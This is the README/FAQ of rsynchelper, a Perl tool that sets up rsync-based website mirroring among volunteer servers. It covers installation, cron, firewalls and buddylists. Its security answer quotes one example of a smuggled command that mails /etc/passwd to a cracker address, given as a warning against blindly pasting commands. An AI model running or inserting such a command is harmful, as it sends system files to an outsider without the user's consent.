Welcome to rsynchelper.

Here is the FAQ (also in the sourcecode)



                        rsynchelper README

Version: $Id: FAQ,v 1.1 2001/02/27 09:10:28 saralin Exp $
Copyright Sara Lin 
Released under GPL - see LICENCE 

1. Questions for people thinking about installing rsynchelper
2. Details on mirroring a site from another server
3. Details on asking servers in your buddylist to mirror a site on your server

-------------------------------------------------------------------
1. Questions for people thinking about installing rsynchelper

1.1) What is mirroring?  Why mirror?
1.2) rsynchelper in non-technical language.
1.3) What are the pre-requisites for using rsynchelper?
1.4) rsynchelper in technical language.

1.5) Is it a lot of work to be a mirror?  What are the downsides?
1.6) Sounds good -- how do I become a mirror?
     What is the install process?
1.7) Joining or setting up a buddylist

-------------------------------------------------------------------
2. Details on mirroring a site from another server

2.1) I've gotten a request to mirror a site -- what do I do?
2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I setup broader mirroring to servers I trust?
2.6) I'm having problems mirroring -- what should I do?
2.7) I run NT, can I participate?
2.8) I can view my own rsync server modules, but other people can't view mine,
     or I can't view other people's.  Is there a firewall issue?
2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?
2.10) Is rsynchelper secure? Are there any security issues?
2.11) Why doesn't rsynchelper use ssh?
2.12) I think I've mirrored a site, but how can I tell?
2.13) Do I have to be in a certain directory to run rsynchelper?  
      Do I run it as a certain user?

-------------------------------------------------------------------
3. Details on asking servers in your buddylist to mirror a site on your server

3.1) How do I get other hosts to mirror a site?

3.2) How does a member of the public get to the mirrored site?
     What is the mirrored site's new URL?

3.3) I want servers to stop mirroring my site, what do I do?

3.4) How do I convert non-mirrorable absolute links to relative links?

3.5) How do I know that other host successfully mirrored from me?
     Where is a log of who has mirrored my site?  

==========================================================================
---- Answers
==========================================================================

1.1) What is mirroring?  Why mirror?

A simple definition of mirroring: 
"When one server makes an exact copy of the content on another server."

Why mirror?  These are a few possible motives:
a) make a closer copy of the content to make downloads faster
b) join the bandwidth capacity of several servers to cope with popular sites
c) demonstrate support for the content
d) defend against suppression of the content

Popular open-source software projects are the group that uses mirrors
the most often.  Controversial web sites on human rights / corporate
whistle-blowers also use mirroring.  rsynchelper is only a generic
tool -- you are responsible for your own choices of what content to
mirror.

1.2) rsynchelper in non-technical language.

rsynchelper is designed to make it easy for a loose group of mirrors to
quickly and easily setup mirroring time and time again.

rsynchelper makes it easier to use mirroring.  rsynchelper:
a) makes it easier to make your content available for others to mirror
b) makes it easier to mirror someone else's content
c) automates maintaining an accurate list of who is maintaining which content

It takes about 5-10 minutes to setup rsynchelper the first time.  Each
time a server in a buddy network gets a request to mirror a site, they
can setup the mirroring simply by cutting and pasting a single command
(less than a minute).  

Each member of the mirror network chooses whether or not to mirror
each site.  There is an automatically generated and often widely
distributed list of which sites are mirroring each site.

1.3) What are the pre-requisites for using rsynchelper?

rsynchelper helps linux/unix computers use the mirroring program rsync.
rsync can be found at http://rsync.samba.org/ -- 
it is the state of the art for efficiently syncronizing files between servers.

To use rsynchelper to mirror others you only need perl and rsync.

To make your information available to others, you need root access 
and must NOT have the rsync port blocked by a firewall.

1.4) rsynchelper in technical language.

A server (host X) asks others on the mirrorlist:
"Please mirror the site called 'site1' from me."

A server Y chooses to mirror the site and runs the command:
  rsynchelper hostX::mirror_me/site1 /hostX/

This copies files from host X to host Y and puts them in a directory
on host Y.  To get to the site, the general public will then go to
  http://hostY/mirrors/hostX/site1 

For more on how this works, read Section 2 of this FAQ.

To review what a single server needs to participate in a mirror network:

a) To be able to mirror others, you use the program 'rsync'.
b) To setup regular mirroring, you use run rsync via cron.
c) To have other servers mirror you, you need to run  
   the rsync server 'rsyncd', and edit /etc/rsyncd.conf 

rsynchelper has two pieces -- an installer and script :

a) the installer configures your computer to be an rsync server, ie it
   edits, when needed, /etc/rsyncd.conf /etc/services /etc/inetd.conf
   By default, it links the rsync module 'mirrors' to a directory 
   available to your webserver.

b) the perl script rsynchelper simplifies common mirroring tasks
   via rsync and cron.  It helps beginning unix administrators
   to easily act as mirrors.

There is another script, 'mirrorlist', that plays a supportive
role.  Not every server running rsynchelper needs to run
mirrorlist.  mirrorlist:

c) polls a list of servers and creates an up-to-date list of 
   which servers are mirroring each site on the list.

1.5) Is it a lot of work to be a mirror?  What are the downsides?

To INSTALL:   After skimming this document, it will take less than 5 minutes
              to install rsynchelper.  If you need to install rsync, that will 
              also only take a few minutes.  If you need to open up your 
              firewall to allow access to rsyncd, this will take additional
              time, depending on local setup and skill.

TO MAINTAIN:  When a site comes up for protection, and you want to 
              mirror that site, it will only take cutting and pasting
              one command from an email message to start mirroring the site.

SYSTEM USAGE: The first time you mirror a site, you download the whole site. 
              Each night, your cronjob downloads only the changes, often 
              less than 1% of the size of the whole site.
              Some people will web-browse your mirror.
              Most visitors will go to the mirrors they 
              perceive as being high-bandwidth/fast sites, so visitors will
              probably not consume too much bandwidth.

TIME:         It takes some time to monitor a buddylist listserve,
              and decide whether you want to mirror a site.  Some content
              may not be appropriate for your server.  Most buddylists
              listserv's have very low traffic.
             
1.6) Sounds good -- how do I become a mirror?
     What is the install process?

To install:
 
a) get latest version of sourcecode from
   http://sourceforge.net/files/project=xxxx

b) install rsynchelper
   gunzip -c rsynchelper-x.tar.gz | tar xzf -- 
   cd rsynchelper && perl install.pl # this will be perl5 install.pl 

c) possibly open up your firewall
   You may need to open up your firewall to allow other people
   to mirror sites from you via rsync.  If you have a firewall, see FAQ 2.8

d) join or setup a buddylist
   see FAQ 1.7

1.7) Joining or setting up a buddylist

rsynchelper is designed to make it easy for a group of servers
(a buddylist) to often join together in mirroring a site.

There are two buddylist aspects to mirroring:
* Getting on a mailinglist where new requests for mirroring are posted
* Having your server be automatically 'polled' to see what sites are
  being mirrored.

To join a buddylist, you
a) install rsynchelper
b) join a mailinglist for a buddylist
c) send your configuration to the mirrorlist servers, who will poll you

To setup a new buddylist you
a) install rsynchelper on several servers
b) install mirrorlist on one or more servers
c) create a mailinglist for people to join
d) ask others to join your buddylist by 
   publicizing the email address for the maintainers of b) and c)

If you run a server at a university, business, or as an individual,
you probably want to join an existing buddylist.  Each buddylist is
independent, so you need to find the homepage of the buddylist(s) that
you are interested in.  Generally people reading this document will do
so from a buddylist homepage.  Some buddylist homepages are listed:
  http://rsynchelper.sourceforge.net/external_links/

If you are are an association of servers, or are concerned with a
particular type of content not served by existing buddylists, you may
want to setup your own buddylist.  After it is up and running, you may
want to add your list to:
  http://rsynchelper.sourceforge.net/external_links/

--------------------------------------------------------------------
2.1) I've gotten a request to mirror a site -- what do I do?

If you join a buddylist listserve, you will get requests from servers
to mirror their sites.  If you choose to mirror the site, cut and
paste the rsynchelper command they suggest.

They will probably suggest you run a command like:
   rsynchelper -c server.org::mirror_me/test1 /server.org/

The -c option will semi-automatically setup ongoing mirroring
(by putting the rsynchelper command in cron).

You may want to manually edit your crontab, in which case, do not
use -c , but use -v to see the suggested entry to the crontab, like  
   rsynchelper -v server.org::mirror_me/test1 /server.org/

The crontab entry will look something like this:
0 1 * * * rsynchelper server.org::mirror_me/test1 /server.org/

This will be in the crontab of the user who owns the mirror_me
directory.  This user is usually 'nobody', but you pick this user when
you run install.pl

2.2) I don't want to choose what I mirror on a site-by-site basis.
     Can I setup broader mirroring to servers I trust?

     Yes. You have two options for 'trust' based automation.

     A) To mirror all sites, for example, that server.org ASKS 
     you to mirror, do:
       rsynchelper server.org::mirror_me/* /server.org/

     B) You can also play 'follow the leader', and mirror the same sites that 
     another server mirrors.  For example, to mirror everything that server.org
     mirrors from other people, do: 
       rsynchelper server.org::mirrors/* /

2.6) I'm having problems mirroring -- what should I do?

   Contact your buddylist listserv or technical contact for help.
   If you are a buddylist technical contact, you should join
   rsynchelper-techies@lists.sourceforge.net where you can give and receive
   advice.

   You may also want to read-up on rsync, as the mirror system is build on
   that.  Read the 'man rsync' 'man rsyncd.conf' 
   The rsync homepage has a number of good tutorials, including
      http://www.eunuchs.org/linux/rsync/

2.7) I run NT, can I participate?

Not yet.  rsynchelper would need to be ported to NT.

rsync runs fine on NT.  You can participate if you want to convert
rsynchelper.pl to NT.  rsynchelper is a perl script, which can work on
NT. -- however, the paths to $mirrors and $rsync_bin would have to
edited, and the cron stuff dealt with.

The install.pl program will not work, as it relies too much on a UNIX
environment.

2.8) I can view my own rsync server modules, but other people can't view mine,
     or I can't view other people's.  Is there a firewall issue?

There is probably a firewall issue.
For your rsync server to be visbile, port 873 needs to be open.
To reconfigure your firewall, you should know what you are doing!
On a cisco system, you would add something like this line (replacing 192...)

access-list 101 permit tcp any host 192.168.1.33 eq 873

On a computer that uses IPCHAINS,

If the default input policy to your host is DENY, you may open the port
with:

ipchains -I input -d  192.168.1.33 873 -p tcp -j ACCEPT

(replace the IP number above with your host's IP)

2.9) I have an existing /etc/rsyncd.conf - can I safely install this program?

Yes.  Keep a backup copy of /etc/rsyncd.conf , and then run install.pl
Then look at /etc/rsyncd.conf  Do the modules look OK?

2.10) Is rsynchelper secure?

The most obvious danger with rsynchelper is that people often use it 
in conjunction with a mailinglist -- they get requests from the mailinglist
to mirror a site and cut and paste the rsynchelper command onto the
command line.  Whenever you run a command, you should look carefully at
the command.

It is fine if the command looks like:
 rsynchelper -c server.org::mirrors/site1 /server.org/

But don't run it if it looks like:
 rsynchelper -c s.org::mirrors/1 /s/ ; Mail -s1 1@cracker.org < /etc/passwd

Also, look at the second argument -- is it normal, or does it contain 
special characters?  Don't run the command if you are suspicious.

Basically, the current use of rsync by rsynchelper is as secure as rsync
is.  It is secure unless there are undiscovered buffer overflows, etc...

2.11) Why doesn't rsynchelper use ssh?

Summary of the issue:  rsh is badly broken, and often opens up security
holes.  ssh is a drop in replacement for rsh, which is both more secure
AND encrypts traffic.  rsynchelper uses rsync in a the special rsync-server
mode.  This mode does not use use either ssh or rsh.  This mode is not
vulnerable to the same problems as rsh.  However, this mode does not
encrypt traffic.  Luckily, in our case, the traffic is publically
available webpages.

We don't run rsync over ssh because then servers would need accounts on
each other (for ssh logins).  Most big mirror networks use the special
rsync server mode that we use.

2.12) I think I've mirrored a site, but how can I tell?

The simplest thing is to run rsynchelper with the
-v option the first time you mirror the site.
It will show you the files it is copying.

With or without the -v option, rsynchelper should
tell you if it runs into trouble.

You can also just look in the filing system and see whether or not the
new site has been mirrored to your server.

If you ran the command
 rsynchelper server.org::mirrors/site1 /server.org/

Then, there should be a directory full of files at:
  $mirrors/server.org/site1 


2.13) Do I have to be in a certain directory to run rsynchelper?  
      Do I run it as a certain user?

You do NOT have to be inside the correct directory before running
rsynchelper .  One of the jobs of rsynchelper is to setup to correct
environment to rsync.  You can run rsynchelper as either root or the
correct user.  If it is run as root it will switch to the user
specified in /etc/rsynchelper.conf

--------------------------------------------------------------------
Publishing Threatened Sites

3.1) How do I get other hosts to mirror a site?

Put mirror-able files in a subdirectory of your mirror_me directory.

HTML files will need to use relative links, or they won't mirror well.
If your HTML files use absolute links, see FAQ 3.4

Email the mailinglist to let people know you want mirrors.  Tell
people the commands to run to mirror your site.

-start of email-
Please run this command to immediately mirror us:
 rsynchelper -c rsync://my.server.org/sitename /my.server.org/

This site is about xxx, and is size xxx.
-end of email-

If you are concerned about authentication, PGP sign you message 
and say where people can go to get your public key.

3.2) How does a member of the public get the mirrored site?
     What is the mirrored site's new URL?

Once a site has been mirrored, the public still needs to view
an 'index' page that lists where the mirrors are.  Some 'indexing servers'
poll all the servers in a buddylist and assemble a list of who is 
mirroring what.

3.3) How do I get servers to stop mirroring my site?

Email your buddylist and ask people to run, for example,  
 rsynchelper -R rsync://my.server.org/sitename /my.server.org/

Some people may require that you PGP sign your 'stop' request to 
prevent vandals from forging a stop request.

3.4) How do I convert non-mirrorable absolute links to relative links?

You can use w3mir or wget.

The wget manual explains how to do this under Directory.
  http://www.gnu.org/manual/wget/index.html

Here is summary:

#create the directory where you will put the files like:
mkdir /tmp/local_links
cd    /tmp/local_links

wget -r -k -nH http://some.virtual.com/
# or, if the original site is already in a subdirectory
wget -r -k -nH --cut-dirs=1 http://some.host.com/somedir/index.html

3.5 How do I know that other host successfully mirrored from me?
    Where is a log of who has mirrored my site?

By default, rsyncd logs to the syslog daemon, which in turn logs
different types of messages to different log files. On my laptop, this
means that I get informational messages about rsync transfers in
/var/log/messages , but the exact logfile will depend on your
/etc/syslog.conf

You can also specify a log file directly in /etc/rsyncd.conf.

Read 'man rsyncd.conf' for how to customize logging.  'man
syslog.conf' may be helpful if you are trying to understand syslog for
the first time.